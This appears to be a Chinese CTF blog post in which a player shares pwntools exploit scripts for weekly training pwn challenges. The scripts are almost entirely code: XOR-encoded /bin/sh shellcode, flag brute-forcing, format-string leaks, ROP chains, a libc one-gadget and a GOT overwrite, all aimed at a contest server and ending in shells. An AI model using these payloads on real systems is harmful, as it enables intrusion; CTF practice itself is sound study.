去年也是这时候,记得是校赛后Lilac学长让我们做的训练题,不过去年只做web,今年只看了PWN
week 4不一定有时间抢pwn一血了,所以把一些脚本先放了
(为什么平台没有密码找回功能,我也没私聊管理,week1后账号没了,换小号上)
第一周:Kirin-say , 二三周:梅零落
PWN题:
week1:一血:2,二血:1
week2:一血:1,二血:2
week3:一血:2,二血:1,三血:1
前3 week总体很简单,都是20 mins内能解决的题目(不过周五真心事多)
week 1
1
from pwn import *
p=process("./babysc")
p=remote("118.24.3.214",10000)
s="\x6a\x3b\x58\x99\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\xb0\x3b\x0f\x05"
#s="aaaaaaaaaaaaaaaaa"
payload=""
for i in range(len(s)):
payload+=chr(ord(s[i])^(i+1))
print payload
p.sendline(payload)
p.interactive()
2
payload="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
3
# -*- coding: utf-8 -*-
from pwn import *
#context.log_level="debug"
flag=""
ans=""
for i in range(32):
p=remote("118.24.3.214",10001)
#p=process("./CSTW")
p.send("\n\n\n\n\n")
# p.recvuntil("——\n")
for k in range(32,256):
p.recvuntil("——\n")
ans=flag+chr(k)+"\x00"
p.send(ans)
s=p.recvuntil("\n")
#print s
if "..勇者Ch1p" in s:
flag+=chr(k)
print flag
p.close()
break
print flag
4
from pwn import *
p=remote("118.24.3.214",10002)
#p=process("./Steins;Gate")
p.sendlineafter("ID:","/bin/sh\x00kirin")
p.sendafter("world.\n","a"*48+"3#")
p.sendafter("man.\n","%7$p")
#gdb.attach(p)
s=p.recvuntil("00")
s=int(s[:-2],16)
print hex(s+0x1234)
#gdb.attach(p)
p.sendafter("?\n","ff\x00\x00"*12+p32(s+0x1234))
p.sendafter("debts.\n","%11$p")
s=int(p.recvuntil("00"),16)
print hex(s)
#gdb.attach(p)
p.sendafter("To seek the truth of the world.\n","a"*48+"3#\x00\x00"*2+p64(s)+"a"*8+p64(0x400c73)+p64(0x602040)+p64(0x400a76))
p.interactive()
week 2
1
from pwn import *
p=remote("118.24.3.214",11000)
#p=process("./CSTW2")
for i in range(5):
p.recvuntil("\n")
p.send("\n")
p.recvuntil(">")
#gdb.attach(p)
p.sendline("-9")
p.sendlineafter(">",p64(0x40096a))
p.interactive()
2
from pwn import *
context.log_level="debug"
while True:
try:
p=remote("118.24.3.214",11003)
p.sendlineafter("ID:","/bin/sh\x00kirin")
p.sendafter("world.\n","a"*48+"3#")
p.sendafter("man.\n","%7$p")
#gdb.attach(p)
s=p.recvuntil("Y")
s=int(s[:-9],16)
print hex(s+0x1234)
#gdb.attach(p)
p.sendafter("?\n","ff\x00\x00"*12+p32(s+0x1234))
p.sendafter("debts.\n","%11$p")
s=int(p.recvuntil("00"),16)
print hex(s)
#gdb.attach(p)
p.sendafter("To seek the truth of the world.\n","ff\x00\x00"*12+"3#\x00\x00"*2+p64(s)+"a"*8+"\xdb\x0d")
#gdb.attach(p)
p.sendlineafter("ID:","/bin/sh\x00kirin")
p.sendafter("world.\n","a"*48+"3#")
p.sendafter("man.\n","%7$p")
#gdb.attach(p)
s2=p.recvuntil("Y")
s2=int(s2[:-9],16)
print hex(s2+0x1234)
#gdb.attach(p)
p.sendafter("?\n","ff\x00\x00"*12+p32(s2+0x1234))
p.sendafter("debts.\n","%3$p")
s1=int(p.recvuntil("W")[:-2],16)-(0x7f0a1bc1e260-0x7f0a1bb27000)+0x45216
print hex(s1)
#gdb.attach(p)
p.sendafter("To seek the truth of the world.\n","\x00\x00\x00\x00"*12+"3#\x00\x00"*2+p64(s)+"a"*8+p64(s1)+p64(0)*6)
#gdb.attach(p)
p.interactive()
break
except:
print "kirin"
3
from pwn import *
p=remote("118.24.3.214",11002)
#p=process("./handsomeariis")
#gdb.attach(p)
p.sendlineafter("Repeat me!\n","Aris so handsoooome!"+"\x00"*20+p64(0x0400873)+p64(0x601018)+p64(0x400590)+p64(0x400735))
p.recvuntil("Great! Power upupuppp!\n")
s=u64(p.recv(6)+"\x00\x00")-0x06f690+0xf02a4
p.sendlineafter("Repeat me!\n","Aris so handsoooome!"+"\x00"*20+p64(s))
p.interactive()
4
from pwn import *
#p=process("./babyfmtt")
p=remote("118.24.3.214",11001)
#400e84
payload1="%2126c%8$hnkirin"+p64(0x601020)+p64(0xffffffffffffffff)*12
#gdb.attach(p)
p.sendlineafter("PWN\n",payload1)
p.interactive()
week 3
【周五晚or周六更新】
网友评论